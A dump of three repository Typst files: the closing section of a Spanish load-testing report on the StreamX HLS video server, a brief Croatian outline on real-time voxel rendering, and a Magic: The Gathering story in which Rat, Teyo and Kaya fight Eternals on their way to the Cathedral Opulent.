y 0.3 en diferentes puntos, sugieren que el sistema aún enfrenta bloqueos de
solicitudes, incluso bajo condiciones de red ideales.
Al revisar la configuración del servidor, notamos que habíamos implementado un
mecanismo de rate limit para controlar el tráfico de solicitudes. Este
mecanismo fue configurado para limitar el número de solicitudes que pueden
procesarse en un periodo de tiempo determinado, con el objetivo de evitar la
sobrecarga del servidor. Sin embargo, las pruebas revelaron que los parámetros
de configuración del rate limit no eran óptimos para la demanda real que
implica servir un solo video en condiciones de alta carga.
El límite configurado inicialmente resultó ser demasiado bajo para satisfacer
las exigencias del sistema de streaming. Esto provocó que, incluso en un
entorno con condiciones de red óptimas, se bloquearan solicitudes que el
servidor podría haber manejado si el límite hubiera sido más alto. Estas
pruebas nos permitieron identificar la necesidad de ajustar los parámetros del
rate limit, para que el sistema pueda procesar un mayor volumen de solicitudes
sin que se produzcan bloqueos innecesarios, especialmente al atender a varios
usuarios simultáneos que acceden al contenido multimedia.
=== Datos Enviados
==== 500kbits de ancho de banda
#figure(caption: [Data Sent Over Time \@ 500kbits bandwidth], image("k6/user-uploading-video-500kbit-data_sent_plot.svg")) <fig4>
El gráfico mostrado en la Fig. @fig4 muestra la cantidad de datos enviados
durante la subida de un video bajo una restricción de ancho de banda de
500kbits. En el eje X se representa el tiempo, mientras que en el eje Y se
muestra la cantidad de datos enviados, con un valor total en el rango de $10^7$
bytes.
El comportamiento del sistema bajo esta restricción de ancho de banda revela
varios patrones importantes sobre la forma en que el servidor gestiona la
transmisión de datos cuando el ancho de banda es limitado.
Al inicio del gráfico, la cantidad de datos enviados comienza en un valor
cercano a $3.5 times 10^7$ bytes y crece rápidamente, alcanzando un pico de
aproximadamente $7.5 times 10^7$ bytes hacia la mitad del período observado. Este
comportamiento refleja que, a pesar de las limitaciones impuestas por el ancho
de banda, el sistema puede mantener un ritmo de subida relativamente constante
en los primeros momentos del proceso de subida del video.
Sin embargo, tras alcanzar este pico, el gráfico muestra una serie de
fluctuaciones, con caídas y picos en la cantidad de datos enviados a lo largo
del tiempo. Estas oscilaciones indican que el sistema no puede mantener un
flujo de datos constante debido a las restricciones de ancho de banda. Es
probable que, en los momentos donde se observan descensos en la cantidad de
datos enviados, el ancho de banda limitado esté impactando la capacidad del
servidor para continuar transmitiendo datos de manera estable.
Estas fluctuaciones podrían estar relacionadas con la forma en que el
mecanismo de control de flujo del servidor interactúa con la limitación de
ancho de banda. El servidor intenta enviar tantos datos como sea posible en
los momentos de disponibilidad de la red, pero la restricción del ancho de
banda hace que este ritmo no sea uniforme, generando momentos donde la
velocidad de subida disminuye significativamente.
==== 20% Pérdida de Paquetes
#figure(caption: [Data Sent Over Time \@ 20% Packet Loss], image("k6/user-uploading-video-20p-packet-loss-data_sent_plot.svg")) <fig5>
El gráfico que proporcionamos en la Fig. @fig5 muestra el comportamiento del
sistema en términos de datos enviados durante la subida de un video, esta vez
bajo una condición de red con 20% de pérdida de paquetes (packet loss). A
diferencia del gráfico anterior, que estaba limitado por un ancho de banda de
500kbits, aquí el impacto en la transmisión de datos es causado por la pérdida
de paquetes en lugar de un ancho de banda reducido.
En el eje X se representa el tiempo, mientras que el eje Y muestra la cantidad
de datos enviados, con valores en el rango de $10^7$ bytes.
Al comienzo del gráfico, se observa un crecimiento relativamente constante en
la cantidad de datos enviados, que pasa de $4.5 times 10^7$ bytes a un máximo
cercano a $7.5 times 10^7$ bytes. Esta tendencia indica que, incluso bajo
condiciones de pérdida de paquetes, el servidor es capaz de enviar datos de
manera eficiente durante los primeros momentos de la transmisión. Sin embargo,
la pérdida de paquetes empieza a afectar el rendimiento posteriormente.
Una diferencia clave respecto al gráfico anterior es que, aunque hay un patrón
de aumento en los datos enviados, se observan picos y caídas más marcadas en
el volumen de datos transmitidos. Después de alcanzar un máximo alrededor de
los $7.5 times 10^7$ bytes, el gráfico muestra una caída visible, seguida de una
recuperación parcial. Esta fluctuación refleja cómo la pérdida de paquetes
interrumpe la transmisión de datos, lo que obliga al servidor a realizar
retransmisiones o ajustes para compensar los datos que no llegaron
correctamente al destinatario.
A pesar de estas interrupciones, el sistema logra recuperar su ritmo de envío
en varios puntos, lo que indica que, aunque el 20% de packet loss impacta el
flujo de datos, el servidor implementa mecanismos que le permiten mitigar
parcialmente este efecto. No obstante, a lo largo del tiempo, las
fluctuaciones son evidentes y muestran que la pérdida de paquetes tiene un
impacto más dinámico en comparación con el ancho de banda limitado, lo que
genera caídas repentinas en la cantidad de datos enviados.
==== Configuración de Red Óptima
#figure(caption: [Data Sent Over Time \@ Optimal Settings], image("./k6/uploading-video-data_sent_plot.svg")) <fig6>
El gráfico presentado en la Fig. @fig6 muestra la cantidad de datos enviados
durante la subida de un video bajo una configuración de red óptima, es decir,
sin restricciones significativas como pérdida de paquetes o limitaciones de
ancho de banda. En el eje X se representa el tiempo, mientras que el eje Y
muestra la cantidad de datos enviados, con valores en el rango de $10^7$ bytes.
El comportamiento observado en esta configuración refleja un flujo de datos
fluido y relativamente estable. Desde el inicio, se aprecia un crecimiento
continuo en la cantidad de datos enviados, comenzando desde $4.5 times 10^7$ bytes y
subiendo progresivamente hacia $7.5 times 10^7$ bytes. A lo largo del tiempo, el
gráfico muestra varios picos y caídas, aunque las fluctuaciones son leves y no
interrumpen significativamente el flujo de datos.
El sistema parece funcionar de manera eficiente, ya que las caídas observadas
no son pronunciadas y no afectan el rendimiento de manera importante. A pesar
de algunas oscilaciones, el flujo general de datos es sostenido, lo que indica
que el servidor está gestionando bien la transmisión de grandes volúmenes de
datos sin interrupciones evidentes. Los picos hacia el final del gráfico
muestran que el sistema continúa enviando datos a una velocidad consistente y
alta, lo que es indicativo de un entorno de red saludable.
=== Peticiones Http Fallidas
==== 20% Pérdida de Paquetes
#figure(caption: [Failed Http Requests Over Time \@ 20% Packet Loss], image("k6/user-uploading-video-20p-packet-loss-http_req_failed_plot.svg")) <fig7>
El gráfico de la Fig. @fig7 muestra la evolución de las conexiones fallidas a
lo largo del tiempo en un entorno donde existe una restricción de 20% de
pérdida de paquetes (packet loss). En el eje X se presenta el tiempo, mientras
que en el eje Y se representan los valores de las solicitudes HTTP que
fallaron. Al observar la tendencia del gráfico, se puede apreciar cómo el
sistema se comporta en condiciones adversas de red, con una alta tasa de
pérdida de paquetes.
Inicialmente, se observa un pico cercano a 1.0, lo que indica que, al comienzo
del período de prueba, la mayoría de las solicitudes estaban fallando. Este
comportamiento es típico al inicio de un entorno de red con alta pérdida de
paquetes, donde muchas de las solicitudes no logran completarse exitosamente
debido a la inestabilidad de la red.
A medida que avanza el tiempo, se evidencia una tendencia descendente en el
número de solicitudes fallidas. El gráfico muestra una serie de caídas
sucesivas, con algunos pequeños picos de recuperación intercalados, pero en
general, la cantidad de solicitudes que fallan va disminuyendo
progresivamente. Esta reducción puede estar relacionada con la capacidad del
sistema para adaptarse y gestionar las retransmisiones de paquetes perdidos, o
bien porque algunas conexiones logran completarse a pesar de la pérdida de
paquetes, mejorando los resultados a lo largo del tiempo.
En las fases finales del gráfico, los valores caen por debajo de 0.5, lo que
indica que menos del 50% de las solicitudes están fallando al final de la
prueba. Aunque esta mejora es notable, sigue reflejando un entorno de red con
importantes limitaciones, ya que un 20% de pérdida de paquetes sigue afectando
negativamente la eficiencia del sistema.
==== 500kbits de Ancho de Banda
#figure(caption: [Failed Http Requests Over Time \@ 500kbits bandwidth], image("./k6/uploading-video-http_req_failed_plot.svg")) <fig8>
El gráfico proporcionado en la Fig. @fig8 refleja la cantidad de solicitudes
HTTP fallidas a lo largo del tiempo en un entorno donde la restricción es un
ancho de banda limitado a 500kbits. El eje X representa el tiempo, mientras
que el eje Y muestra el valor de las solicitudes que fallaron.
Al inicio del gráfico, se observa un valor elevado cercano a 0.9, lo que
indica que al comienzo del período de prueba, una gran cantidad de solicitudes
estaban fallando debido a la restricción en el ancho de banda. Esta alta tasa
de fallos es típica en escenarios donde el servidor se ve limitado en su
capacidad para procesar y enviar datos a una velocidad suficiente para manejar
la demanda.
A medida que la prueba avanza, el gráfico muestra una caída significativa en
las solicitudes fallidas, llegando a aproximadamente 0.5. Sin embargo, tras
esta mejora inicial, el sistema parece estabilizarse con fluctuaciones
alrededor de 0.5 y 0.7 en el valor de solicitudes fallidas. Estas
fluctuaciones indican que, aunque el sistema ha reducido las fallas iniciales,
el ancho de banda limitado sigue afectando el rendimiento y una parte
considerable de las solicitudes continúa fallando.
Cerca del final del gráfico, se observa una caída pronunciada en las
solicitudes fallidas, descendiendo hasta 0.2. Esto sugiere que, con el paso
del tiempo, el sistema puede haber ajustado el manejo de las solicitudes o
reducido la carga de red, lo que permite una mayor cantidad de solicitudes
exitosas a pesar de las limitaciones de ancho de banda.
==== Configuración de Red Óptima
#figure(
caption: [Failed Http Requests Over Time \@ Optimal Settings],
image("./k6/user-uploading-video-no-constraints-http_req_failed_plot.svg")
) <fig9>
El gráfico de la Fig. @fig9 muestra la cantidad de solicitudes HTTP fallidas a lo largo del
tiempo en un entorno con configuración de red óptima, es decir, sin
restricciones significativas como limitaciones de ancho de banda o pérdida de
paquetes. En el eje X se representa el tiempo, mientras que en el eje Y se
observa el valor de las solicitudes fallidas.
En este gráfico, los valores se mantienen consistentemente en 0 durante todo el
período de tiempo analizado. Esto significa que no se registraron solicitudes
HTTP fallidas bajo esta configuración de red, lo que es indicativo de un
entorno de red completamente estable y capaz de manejar la demanda de tráfico
sin que ocurra ningún fallo en las solicitudes.
La ausencia total de fallos en las solicitudes HTTP bajo una red óptima refleja
que el sistema es capaz de gestionar las conexiones de manera eficiente cuando
no hay limitaciones impuestas por factores externos, como ancho de banda
limitado o pérdida de paquetes. Esto demuestra que el sistema está bien
optimizado para operar en condiciones ideales, garantizando que todas las
solicitudes lleguen a su destino sin interrupciones.
= Conclusiones
El sistema StreamX está diseñado para manejar grandes volúmenes de solicitudes
simultáneas y entregar contenido multimedia de manera eficiente utilizando el
protocolo HLS. La arquitectura se basa en una estructura escalable con un
balanceador de carga, un servidor implementado en Go y almacenamiento de blobs
en PostgreSQL. El sistema permite a los usuarios reproducir videos sin
necesidad de descargarlos completamente, proporcionando una experiencia en
tiempo real similar a plataformas como Netflix.
En cuanto al rendimiento, las pruebas bajo condiciones de red adversas como
pérdida de paquetes y limitaciones de ancho de banda revelaron un
comportamiento adaptativo del sistema. A pesar de los picos iniciales de
solicitudes bloqueadas o fallidas, el sistema logró estabilizarse, aunque no
alcanzó un rendimiento completamente óptimo bajo estas condiciones. En un
entorno ideal, el sistema no mostró fallos en las solicitudes, lo que confirma
que StreamX funciona de manera eficiente cuando no hay limitaciones
significativas en la red.
|
|
https://github.com/Caellian/UNIRI_voxels_doc | https://raw.githubusercontent.com/Caellian/UNIRI_voxels_doc/trunk/content/realno_vrijeme.typ | typst | = Prikaz u realnom vremenu
- https://0fps.net/2012/06/30/meshing-in-a-minecraft-game/
- https://www.reddit.com/r/VoxelGameDev/comments/j89l6j/texturing_with_greedy_meshing/
- Vokseli sa teksturama nisu vokseli, no ovo je temelj za povezivanje drugih podataka (boje u praktičnom dijelu, occlusion, normale, ...)
== GPU streaming
Opisati kako LOD funkcionira za svijet sastavljen od chunkova.
== Metode optimizacije
@ackoTeardownFrame
#pagebreak()
|
|
https://github.com/polarkac/MTG-Stories | https://raw.githubusercontent.com/polarkac/MTG-Stories/master/stories/038%20-%20War%20of%20the%20Spark/002_The%20Path%20to%20Opulent.typ | typst | #import "@local/mtgstory:0.2.0": conf
#show: doc => conf(
"The Path to Opulent",
set_name: "War of the Spark",
story_date: datetime(day: 15, month: 05, year: 2019),
author: "<NAME>",
doc
)
#align(center)[#strong[I.]]
Hekara was dead.
That's all I knew.
It was lucky, I guess, that I was standing between Teyo and Mistress Kaya, who were fending off the attacking Eternals. I don't think I could've fended off a housecat right then.
#emph[I don't think I would have bothered.]
My memories of the next few minutes aren't terribly clear. I think <NAME> said something about his Beacon summoning more of those Planeswalker types like him and Mistress Kaya and Mister Jura and Mister Beleren and Teyo. I guess there were Planeswalkers appearing all around us. I think one was a minotaur. I dunno.
#emph[Hekara was dead.]
She should have been a Planeswalker. A Planesdancer. I could picture that. Hekara somersaulting across the Multiverse, visiting different worlds, making them all smile. Drawing a little blood. Or, you know, a #emph[lot] of blood.
Plus, if she were a Planeswalker, she could've planeswalked out of the way of whatever killed her.
"How'd she die?" I asked. But only Teyo was paying any attention to me, and he didn't know.
And then something happened. I #emph[really ] hadn't been paying attention to anyone, but I think someone must have cast a spell. Teyo dropped his shield and covered his eyes.
That snapped me out of it. Had to. An Eternal was about to brain my new friend Teyo—my #emph[only] friend Teyo—with a hammer.
Furious, I leapt at it and stabbed it in the eyes. It tottered~then fell.
I was seething. I don't ever remember being this angry.
#emph[I was prime Gruul material now. My parents would be so proud.]
<NAME> said, "Not every Planeswalker is Gatewatch material, you know. And some are downright nasty."
And <NAME> answered, "You have to assume that nasty or not, most Planeswalkers won't be big fans of <NAME>. We need to split up. Spread out through the city. Save as many people as we can and rally every Planeswalker we find."
A bunch of 'em shouted, "Aye!"
Kaya turned to Teyo and me and said, "You two are damn useful. Come with me."
#v(0.35em)
#line(length: 100%, stroke: rgb(90%, 90%, 90%))
#v(0.35em)
#align(center)[#strong[II.]]
Teyo, bless him, was a natural follower. And I wasn't going to leave him alone to die like I had Hekara, so when #emph[he] followed Mistress Kaya's order to follow her, I followed him. I guess it was a good thing. The streets were dangerous enough that it almost took my mind off Hekara for a little while.
#emph[Almost.]
Mistress Kaya was trying to get to Orzhova to summon her guild into battle. But we were a long way from the Cathedral Opulent, and phalanxes and crops of the Dreadhorde were scouring the streets of Ravnica, #emph[killing] everyone they found. The saving grace was that, for whatever reason, the Eternals weren't entering any of the buildings. If folks stayed inside, they'd be safe.
#emph[For now, at least.]
So we crossed Ravnica, through streets, byways, and alleys, and we did a fair decent job of saving people as we went. And because we could tell them to find shelter and stay indoors, we didn't have to worry too much about them afterward. And we never had to chase any Eternals inside ourselves. Which was good, 'cuz fighting in the open was leastways a #emph[bit] safer than taking on these creatures in close quarters.
I mean there were only three of us and Teyo's thing with those light shields was pretty much only defensive.
#emph[Don't get me wrong. We needed him.]
He had our backs, our fronts, our sides. But I don't think he actually killed a single Eternal.
"You've never killed anyone or anything in your life, have you?" I asked him.
"I killed a spider once."
"A giant spider?"
"How giant is giant?"
"Was it bigger than your thumb?"
"No."
"Then just a regular spider."
"Right. Just a regular spider."
I think he thought I was disappointed in him, then. But I think a part of me was glad he was so~what's the word?
#emph[Pure. Yeah. So pure.]
He was already insecure, and I didn't want to add to that. So I decided then and there to kinda put Hekara in my pocket for the time being. We had Eternals to deal with, and he needed me now. I'd mourn later.
#emph[I'd mourn forever.]
"I'm glad you're not a killer," I said.
"Uh~thanks. It's never really come up before now."
Anyway, we tried to avoid the larger contingents, but we did great against individual Eternals or small crops of 'em. Mistress Kaya did the heavy lifting, so to speak. The creatures seemed particularly vulnerable to her ghost daggers. And they couldn't touch her when she was incorporeal. But they could still #emph[see] her, and that made her and Teyo—with his big glowing white shields—good distractions for me. 'Cuz really, none of the Eternals paid me much mind unless I was already killing 'em.
#figure(image("002_The Path to Opulent/01.jpg", width: 100%), caption: [Kaya's Ghostform | Art by: <NAME>], supplement: none, numbering: none)
I'd duck out from behind one of Teyo's diamond-shaped shields, dodge two or three Eternals and then stab one that hadn't seen me coming, usually plunging both daggers into its eyes and deep into its brain. Then I'd be gone before it hit the ground.
Between a couple of these skirmishes, as we crossed a wide but empty street—empty of everything except a handful of corpses that proved Eternals had already been this way— Teyo turned to Kaya and asked, "So are we Gatewatch now?"
"I don't know," she replied. "Never heard of 'Gatewatch' before today. Not entirely clear what it is."
I said, "The good guys, I think."
Teyo nodded. "Ravnica's equivalent to the Shieldmage Order."
Kaya shook her head. "I don't think they're limited to Ravnica. All the members are Planeswalkers. Perhaps they're the Multiverse's equivalent of your Order."
I shrugged. "So~the good guys."
"Yes."
"Then I think both of you #emph[are ] Gatewatch," I said. "Not me, of course. I'm not a 'walker." I laughed then, as a thought struck my Rat brain: #emph[I'm not Gatewatch; I'm Gateless. That's the Rat. Always Gateless.]
"You've killed more Eternals than I have," Teyo said. I tried not to roll my eyes, since he hadn't killed any.
Instead I said, "That's such a sweet thing to say, Teyo. You're such a sweet boy. Isn't he a sweet boy, <NAME>?"
"Very sweet."
He glared at me a bit and said, "I'm pretty sure I'm older than you."
I ignored him, telling Mistress Kaya, "That's why I adopted him first thing." He started to protest or something, but I cut him off. "How's that cut? I can't see a scar."
Thrown a bit, he rubbed his head where the cut used to be. "Fine, I guess. I can't feel it at all."
"It was nice of <NAME> to heal it for you. It's not like he wasn't busy with other things, what with all the Eternals he was killing left and right. Wasn't it nice of M<NAME>, Mistress Kaya?"
"Very nice," she said.
By now, we could see the spiky spires of the Cathedral Opulent looming above closer, shorter buildings. Suddenly, Mistress Kaya took off down an alley running diagonally between two buildings. It seemed a strange choice, but I figured she knew what she was doing, so I grabbed Teyo's hand, and we followed.
About a hundred yards in I realized she was just looking up toward the cathedral, taking the most direct route. I groaned internally and said, "I don't think we want to go this way."
"We do," she replied, "if it'll get us to Orzhova faster."
"It's a dead end."
She stopped short and turned to face me. "You might have mentioned that sooner."
"You looked so confident. I thought maybe you knew about a secret passage. I mean there are a lot of secret passages through Ravnica. #emph[A lot.] And I pretty much know all of them—or most of them, anyway. But I figured that Guildmaster Kaya might know one or two I don't, right?"
"Rat, I've been guildmaster for a matter of weeks. I've only been on Ravnica for a matter of months. I barely know this city any better than Teyo here."
"I only arrived this morning," Teyo said rather needlessly.
"I know that," Mistress Kaya growled.
I nodded to her. "Right, right. So from now on, the native navigates. This way."
Still holding Teyo's hand—#emph[I'm not sure why, I think I just liked holding it] —I pulled him back the way we came. He let himself be dragged behind me. Mistress Kaya followed us.
I heard them coming before I saw them.
#figure(image("002_The Path to Opulent/02.jpg", width: 100%), caption: [Relentless Advance | Art by: <NAME>], supplement: none, numbering: none)
"Okay," I said, "maybe back the other way."
"Why?" she asked. But a split second later she knew. Another crop of Eternals had entered the mouth of the alley. Too many for us to fight in this enclosed space. The minute they spotted us, they charged. We turned and ran.
Mistress Kaya shouted, "You said this was a dead end!"
"It is!"
"Then where are we running to?"
"There's a door to a speakeasy at the end of the alley. It won't get us to the cathedral, but if we get inside maybe the creepies will forget about us.
#emph[It's as good a solution as any.]
The Eternals were fast, but they weren't running for their lives. We beat them pretty handily to the end of the alley and the heavy iron door to Krumnen's. Finally letting go of Teyo, I tried the handle. It was locked.
#emph[Of course. Why would it be open in daylight?]
I banged on the door with both fists. No answer. I knelt and said, "It's okay. I can pick the lock."
"So can I," Kaya said, "but I don't think there's time."
"I'll buy the time," Teyo stated. I glanced over my shoulder and saw him chant up a largish diamond shield of white light, separating us from the Eternals just a second or two before they smashed right into it. He grunted painfully but managed to maintain the shield, even expand it into a rectangle that spanned the width of the alleyway so that none of the creatures could slip around it.
"I didn't know you could do that," I said, while working the lock.
"Neither did I. Never done it before. But I can use the alley walls to substitute for the geometry. It's like leaning in."
"If you say so."
I could hear the weapons of the Eternals slamming against his shield, hear him chanting under his breath and hear him grunt a little in response to every blow. I didn't know how long he'd be able to keep this up.
Something clicked softly. "Got it," I said, standing. I grabbed the door handle, but it still wouldn't budge. "It's unlocked! Must be bolted from the inside!"
Mistress Kaya said, "Leave it to me," and ghosted through the door. She wasn't gone long before her head ghosted back through, and she said, "I'll get it open, but you need to hold out a bit longer."
I looked back at Teyo. He said nothing. But his eyes squinched shut and he nodded once. He was no longer chanting. Just gritting his teeth and leaning toward his shield with both hands, as a lazotep minotaur headbutted it over and over, while the rest of the Eternals smashed maces against it or the butts of their sickle-shaped swords. White light flashed at every impact. The shield wasn't going to hold.
Mistress Kaya must have had the same thought. She ghosted her body back into the alley and drew her daggers, ready to fight.
Fortunately, help came. Once again, I heard the newcomers before I saw them. Heard them whooping and hooting. I smiled and put a hand on Teyo's shoulder. "Just a few more seconds. It'll be all right."
Gruul warriors—<NAME>, <NAME>, <NAME>, <NAME>, Sheeza and Jahdeera, Bombop, and others—attacked the Eternals from behind, axes chopping through lazotep. Tusks piercing. Hammers raining down. <NAME> smashed two Eternal heads together with enough force to shatter their skulls into lazotep and bone fragments.
The Eternals instantly forgot about us and turned to face the Gruul. Teyo slumped, dropping his shield. I stood over him protectively with my daggers out, while Mistress Kaya began attacking the creepies from behind.
Domri cut off an Eternal's head with his long, weighted scythe. He glanced over and cackled out, "You must be Guildmaster Kaya, the almighty ghost-assassin. Lucky for you, <NAME> was here, enjoying the bloody chaos!"
"You're Rade?" Mistress Kaya asked.
I had to suppress a giggle, as Domri looked instantly insulted: "'Course I'm Rade! Who else?"
Domri had always been a dumb little twit. I still couldn't believe he had replaced a fine warrior like Borborygmos as Gruul's new guildmaster. And I really couldn't believe <NAME> was following him. On the other hand, I was glad Domri had led everyone here when he had.
So was Mistress Kaya. "I'm grateful," she said begrudgingly.
"Damn right you are!" he said, quite pleased with himself. By this time, most of the Eternals were in pieces on the ground. Domri snorted and shouted to his warriors, "Okay, mates, fun's over here. Let's find us some more!"
The Gruul started to follow him back up the alley, <NAME> taking up the rear. Unfortunately, one of the Eternals wasn't quite dead enough. It was missing an arm, but that didn't seem to trouble it much, and it leapt to its feet with a sword in its remaining hand, prepared to stab <NAME> in the back.
Teyo reacted even before I did, reaching out a hand and launching a small but solid sphere of white light at the back of the creature's head. It impacted hard, and the Eternal stumbled briefly, making just enough noise to alert Gan Shokta to the danger. He turned in time to see Teyo hit the creepy with another sphere.
Then Mistress Kaya was on the thing, stabbing up into its guts with both her knives. The Eternal was dying—but didn't seem to know it yet. It was still swinging its sword at Gan Shokta.
So I jumped on creepy's shoulders and stabbed my daggers down into its eyes and deep into its skull. It collapsed under me.
Gan Shokta~frowned. I knew he #emph[hated ] being saved by outsiders. With some reluctance, he grunted thanks to both Mistress Kaya and Teyo. Ignoring me, he turned and trotted off to catch up to Domri and the rest.
"Who was that?" Teyo asked.
I shrugged. "The big guy? That's <NAME>. My father."
#v(0.35em)
#line(length: 100%, stroke: rgb(90%, 90%, 90%))
#v(0.35em)
#align(center)[#strong[III.]]
So now we were traveling in packs, I guess.
Me and Teyo Verada and Mistress Kaya were now in the company of Gan Shokta, the ogres Govan and Bombop, Akamal, Sheeza and Jahdeera (the viashino twins), and a handful of other Gruul warriors, shamans, and druids all led by #emph[Master ] <NAME>.
We soon ran into a phalanx of Eternals, and midway through the fight, the enemy got all sandwiched between Simic on the left and Izzet on the right.
"Who are they?" Teyo asked.
I nodded left: "Those are Simic Combine forces. Terraformers, super-soldiers, and merfolk led by Biomancer Vorel." Then I nodded right: "And those are Izzet League mech-mages—that's Master Zarek's guild—led by his second-in-command, Chamberlain Maree."
"Which one's Maree?"
"The goblin."
"Okay."
"I'm gonna test you on all these names later."
He shot me a panicked look before he realized I was teasing him. Then he glared comically.
#emph[I think he likes it when I tease him, you know?]
We made short work of that phalanx, and now we were three guilds strong. But the pack just kept growing.
Another battle brought more help: Planeswalkers this time, a merfolk woman named Kiora from a world called Zendikar, and a young human woman named Samut from someplace called Amonkhet, which apparently was where all these Eternals originally came from.
"You couldn't just keep them there," I asked her, as sarcastically as I could.
She ignored the comment and me. I guess she was a little too busy fighting and mourning, mourning and fighting. She knew the names of every single Eternal she killed, knew them I guess from when they were her friends. (Watching her grief, it was hard not to think of Hekara.) She'd kill one and grimly state, "You are free, Eknet." Then she'd kill two more and say, "You are free, Temmet. You are free, Neit."
I wondered if Hekara showed up as a mindless, murderous Eternal whether I'd be able to kill her.
#emph[Or would it just be easier to let her kill me?]
When the battle ended, we continued on our way, surrounded by this teeming throng of allies.
Mistress Kaya was still trying to get us to Orzhova.
Teyo was staring at Kiora while trying desperately not to make it too obvious.
Shaking my head, I giggled.
"What?" he asked.
"You've never seen merfolk before?"
"We don't have much water on Gobakhan."
I laughed and pointed at one of the Izzet mech-mages. "You've never seen a vedalken?"
"I know people with black skin, brown skin, tawny skin, and tan skin, but I've never seen anyone with blue skin before."
Laughing some more, I nodded in Jahdeera's direction. "You've never seen a viashino?"
"Maybe some of our lizards grow up to be viashino?"
"Ever see a rat before?"
"I've seen many rats on Gobakhan. None like you."
I laughed again and punched him real gentle-like on the arm.
I stole a glance at <NAME>, who was marching just behind Domri and none too happy about it. My father was used to following Borborygmos, someone he could respect as a leader and a warrior. It clearly galled him to act as #emph[Master ] Rade's lieutenant, and he stared daggers at Domri's back. I wanted to reassure him that dumb Domri was an ass, who'd lose control of the Gruul soon enough. But I couldn't figure out a way to navigate that discussion right then. So I just sighed and continued walking between Teyo and Mistress Kaya.
Besides, we were in another fight soon enough.
We'd come up on a cobblestone-covered hill, where the Dreadhorde had the high ground.
Mister Vorel shouted a command: "Take them out! Take them all out!"
Chamberlain Maree looked ready to tell Mister Vorel what he could do with his orders, but <NAME> beat her to the punch with some choice Gruul cursing, which was all kinda pointless, 'cuz the next thing he did was run uphill, shouting, "C'mon, mates! We don't need these lab rats teaching us how to knock heads!"
I could read Chamberlain Maree easy enough. She decided she'd rather be Mister Vorel's ally then follow <NAME>'s example.
So it wasn't the most coordinated of attacks, but Gruul, Simic, and Izzet still stormed the hill together, which was some limited pan-guild progress, I guess.
Of course, we went with 'em: me and Teyo and <NAME> and <NAME>. I looked around for <NAME>, but she was already ahead of the pack, calling out, "You are free, Haq. You are free, Kawit."
Just as Teyo and I reached the summit, two more women materialized within arm's reach of us. Both Planeswalkers had warm brown skin, but otherwise <NAME> and <NAME> (I learned their names later) couldn't have looked less alike. <NAME> was armored and armed, with a long tightly braided black ponytail emerging from beneath her helm. She was short—almost as short as me—but powerfully muscled with searching eyes and a grim mouth. <NAME> wore a long swirling dress, decorated with shiny gold filigree. She was taller than even <NAME> and wore her hair in swirls atop her head, which made her seem taller still. She was lithe and graceful with curious eyes and a smiling mouth.
Different as they were, they were clearly friends. Attempting to size up the situation, they exchanged a quick glance but stood there doing nothing, a little unsure which side they should be on. Teyo more or less answered the unspoken question by throwing up a shield to block an Eternal axe that might otherwise have split Miss Rai's skull.
"Thank you," she said.
"Yes, my thanks," <NAME> echoed.
I had seen enough, so I scurried past them both to get to the fighting. I killed one Eternal just as yet a #emph[third ] Planeswalker appeared. This one seemed to be somehow informed of the situation and immediately joined the battle, using her magic to take control of one of the creepies and setting it against all the others. She had long honey-blonde hair, a blue-white hooded cloak, and a long crook-staff. She told <NAME> that her name was <NAME> or <NAME> or <NAME> or something. (Okay, it wasn't Mistress Kasmagorica.)
#figure(image("002_The Path to Opulent/03.jpg", width: 100%), caption: [Kasmina's Transmutation | Art by: <NAME>], supplement: none, numbering: none)
#emph[But, yes, even] I#emph[ was having trouble remembering everyone's name by this time.]
I lost track of her soon after, but she did some decent damage with her enthralled Eternal right then and there.
So did <NAME>, who took to the killing of creepies quite well.
And that shiny little golden hummingbird that <NAME> released sped right through the forehead of one Eternal and emerged out the back of its skull. The Eternal staggered and dropped. I wanted to catch and keep that useful shiny, but the bird never slowed. It repeated its attack on another Eternal and another.#linebreak #linebreak It wasn't all good news. Poor Bombop rushed in too far ahead of the rest of us. He crushed five or six lazotep skulls with his stone hammer, but the Eternals soon swarmed over him, dragging him down to stab him about thirty times before any of us could catch up to help him.
There was also a Simic shaman—I never did get her name—who took a moment too long to cast her spell and wound up beheaded. The fallen head managed to croak out the last few necessary syllables before expiring, and the creepy that killed her #emph[exploded] in a shower of lazotep and goop.
#emph[So, yeah. Setbacks, you know?]
But the battle was over soon enough. We'd won, and not a single Eternal remained alive—or even undead.
Our pack paused to catch our collective breaths—and then those breaths were stolen away at the sound of a remote but earsplitting #emph[CRACK!] We all turned, and from the top of that hard-won hill, we could see four immense Eternals emerging from the tear in the world to tower over the distant Tenth District Plaza.
I swallowed hard and muttered, "Whoa. Big."
Miss Samut cursed.
Mistress Kaya asked, "What are they?"
"They are our gods," <NAME> said bitterly. "But Bolas killed them or had them killed. Now they are his. His God-Eternals."
#emph[Well, sure. Of course. That's what the day was missing. GOD-Eternals.]
We watched in silence for a bit as the four God-Creepies tore apart what appeared to be Vitu-Ghazi, which was strange and horrific for all sorts of reasons, not the least of which was that I couldn't figure out how the World-Tree had gotten to the plaza from its home in Selesnyan territory in the first place.
I felt like crying again.
And then I felt like hitting <NAME> when he actually #emph[cheered] : "Woohoo! Ya see that! That was Vitu-Ghazi they trashed! Krokt, they taught those Selesnya droops a lesson!"
A couple of his party boys nodded or grunted their agreement, but the rest of us just stared at him, stunned.
He said, "Gruul, we're fighting on the wrong side! This dragon's shaking things up! He'll tear the guilds down! He'll tear Ravnica down! Isn't that what we've always wanted? When the guilds fall, chaos reigns, and when chaos reigns, the Gruul will rule! Ya hear? We're joining the dragon!"
I fought the urge to stab <NAME> in the eyes by looking to see what my father would do. <NAME> did not disappoint. He paused, glowering and then said, "Rade, you'd serve that master?"
"Partner, mate, not serve!"
"You don't know the difference, boy. You're no clan leader. You're a follower. I'm going back to Borborygmos."
<NAME> looked stunned. <NAME> scowled down at him, then turned and walked away. I watched him go, full of Gruul pride.
#emph[Well, it's been a Gruul kinda day for me.]
Teyo looked at me. It occurred to me that he thought <NAME> should have paid more attention to his daughter. I shrugged. Teyo's a good boy, but he didn't understand my family situation at all.
#emph[Which is totally understandable, 'cuz it's kinda odd, and I hadn't actually told him anything about it.]
I wasn't #emph[used ] to telling people about it, frankly, and I wasn't quite sure how I'd even go about it. But I figured he'd catch on eventually.
Anyway, <NAME> pouted for a second or two, before calling out, "Forget <NAME>. He's an old droop, too! This is our moment, ya see?"
Mistress Kaya said, "You're a fool, Rade. Bolas doesn't keep faith with those he #emph[chooses] to bargain with. Do you truly believe you can win his favor unbidden?"
But <NAME> ignored her, leading his warriors downhill toward the plaza, calling out, "Help's on the way, dragon! We'll knock 'em all down together!"
